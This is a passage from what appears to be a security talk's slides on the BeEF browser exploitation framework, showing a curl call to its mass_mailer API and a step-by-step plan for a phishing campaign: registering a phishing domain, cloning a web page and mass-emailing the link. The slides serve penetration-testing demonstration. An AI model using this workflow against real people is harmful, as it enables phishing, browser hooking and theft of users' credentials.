  • 27. BeEF mass_mailer • curl -H "Content-Type: application/json; charset=UTF-8" -d 'body' -X POST http://<BeEF>/api/ seng/send_mails?token=0fda00ea62a1102f { "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF", "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com", "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor" }]} 27
  • 28. BeEF mass_mailer • Demo 28
  • 29. Combine everything FTW • Register your phishing domain • Point the A/MX records to a VPS where you have an SMTP server and BeEF • Create a BeEF RESTful API script that: • Clone a webpage link with web_cloner • Send X emails with that link with mass_mailer • Script intelligent attacks thanks to BeEF browser detection 29
  • 30. Combine everything FTW • Last demo 30
  • 31. BeEF web_cloner + mass_mailer + RESTful API = 31
  • 32. Thanks • Wade to be always awesome • The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather • A few new project joiners: Bart Leppens, gallypette, Quentin Swain • Tom Neaves for the butcher/hook images :D 32